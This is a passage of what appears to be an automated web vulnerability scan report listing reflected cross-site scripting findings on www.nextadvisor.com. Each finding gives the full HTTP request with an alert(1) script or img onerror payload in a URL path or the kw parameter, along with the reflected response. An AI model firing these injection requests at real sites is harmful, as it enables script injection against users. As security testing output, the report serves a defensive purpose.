<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/pmid80329"><script>alert(1)</script>4aaae51729d/" />
...[SNIP]...

6.365. http://www.nextadvisor.com/pmid/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9d626'><img%20src%3da%20onerror%3dalert(1)>287be27fca8 was submitted in the REST URL parameter 1. This input was echoed as 9d626'><img src=a onerror=alert(1)>287be27fca8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /pmid9d626'><img%20src%3da%20onerror%3dalert(1)>287be27fca8/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:19:00 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11922


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<a href='/pmid9d626'><img src=a onerror=alert(1)>287be27fca8/index.php' class='nav_select'>
...[SNIP]...

6.366. http://www.nextadvisor.com/pmid/ [kw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/

Issue detail

The value of the kw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f50a"><script>alert(1)</script>44a276d8c09 was submitted in the kw parameter. This input was echoed as 1f50a\"><script>alert(1)</script>44a276d8c09 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD11f50a"><script>alert(1)</script>44a276d8c09 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:14:02 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 8853


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<input type="hidden" name="bcd" value="id%20gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-01CD11f50a\"><script>alert(1)</script>44a276d8c09">
...[SNIP]...

6.367. http://www.nextadvisor.com/pmid/js/jquery.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/js/jquery.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24a2c"><script>alert(1)</script>911df5ea084 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pmid24a2c"><script>alert(1)</script>911df5ea084/js/jquery.js HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Referer: http://www.nextadvisor.com/pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:33:50 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11883


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/pmid24a2c"><script>alert(1)</script>911df5ea084/js/jquery.js" />
...[SNIP]...

6.368. http://www.nextadvisor.com/pmid/js/jquery.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/js/jquery.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f8df7'><img%20src%3da%20onerror%3dalert(1)>6cd5eb81ae0 was submitted in the REST URL parameter 2. This input was echoed as f8df7'><img src=a onerror=alert(1)>6cd5eb81ae0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /pmid/jsf8df7'><img%20src%3da%20onerror%3dalert(1)>6cd5eb81ae0/jquery.js HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Referer: http://www.nextadvisor.com/pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:34:45 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11932


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<a href='/jsf8df7'><img src=a onerror=alert(1)>6cd5eb81ae0/index.php' class='nav_select'>
...[SNIP]...

6.369. http://www.nextadvisor.com/pmid/js/jquery.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/js/jquery.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fec85"><script>alert(1)</script>1df6d9d92ab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pmid/jsfec85"><script>alert(1)</script>1df6d9d92ab/jquery.js HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Referer: http://www.nextadvisor.com/pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:34:33 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11899


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/pmid/jsfec85"><script>alert(1)</script>1df6d9d92ab/jquery.js" />
...[SNIP]...

6.370. http://www.nextadvisor.com/pmid/js/jquery.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/js/jquery.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c828a"><script>alert(1)</script>d972e93d2be was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pmid/js/jquery.jsc828a"><script>alert(1)</script>d972e93d2be HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Referer: http://www.nextadvisor.com/pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:35:25 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11914


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/pmid/js/jquery.jsc828a"><script>alert(1)</script>d972e93d2be" />
...[SNIP]...

6.371. http://www.nextadvisor.com/pmid/js/jquery.validate.min.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/js/jquery.validate.min.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e678"><script>alert(1)</script>59725e772e8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pmid4e678"><script>alert(1)</script>59725e772e8/js/jquery.validate.min.js HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Referer: http://www.nextadvisor.com/pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:31:07 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11896


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/pmid4e678"><script>alert(1)</script>59725e772e8/js/jquery.validate.min.js" />
...[SNIP]...

6.372. http://www.nextadvisor.com/pmid/js/jquery.validate.min.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/js/jquery.validate.min.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c856d'><img%20src%3da%20onerror%3dalert(1)>43a6f1cd54f was submitted in the REST URL parameter 2. This input was echoed as c856d'><img src=a onerror=alert(1)>43a6f1cd54f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /pmid/jsc856d'><img%20src%3da%20onerror%3dalert(1)>43a6f1cd54f/jquery.validate.min.js HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Referer: http://www.nextadvisor.com/pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:31:58 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11945


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<a href='/jsc856d'><img src=a onerror=alert(1)>43a6f1cd54f/index.php' class='nav_select'>
...[SNIP]...

6.373. http://www.nextadvisor.com/pmid/js/jquery.validate.min.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/js/jquery.validate.min.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 612b5"><script>alert(1)</script>5ee41bf8af was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pmid/js612b5"><script>alert(1)</script>5ee41bf8af/jquery.validate.min.js HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Referer: http://www.nextadvisor.com/pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:31:46 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11910


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/pmid/js612b5"><script>alert(1)</script>5ee41bf8af/jquery.validate.min.js" />
...[SNIP]...

6.374. http://www.nextadvisor.com/pmid/js/jquery.validate.min.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/js/jquery.validate.min.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 999eb"><script>alert(1)</script>e7251367e18 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pmid/js/jquery.validate.min.js999eb"><script>alert(1)</script>e7251367e18 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Referer: http://www.nextadvisor.com/pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:32:37 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11940


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/pmid/js/jquery.validate.min.js999eb"><script>alert(1)</script>e7251367e18" />
...[SNIP]...

6.375. http://www.nextadvisor.com/pmid/style.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/style.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 382db"><script>alert(1)</script>73094e0c235 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pmid382db"><script>alert(1)</script>73094e0c235/style.css HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Referer: http://www.nextadvisor.com/pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:29:57 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11896


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/pmid382db"><script>alert(1)</script>73094e0c235/style.css" />
...[SNIP]...

6.376. http://www.nextadvisor.com/pmid/style.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/style.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e22eb'><img%20src%3da%20onerror%3dalert(1)>65ff3245d2 was submitted in the REST URL parameter 1. This input was echoed as e22eb'><img src=a onerror=alert(1)>65ff3245d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /pmide22eb'><img%20src%3da%20onerror%3dalert(1)>65ff3245d2/style.css HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Referer: http://www.nextadvisor.com/pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:30:08 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11929


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
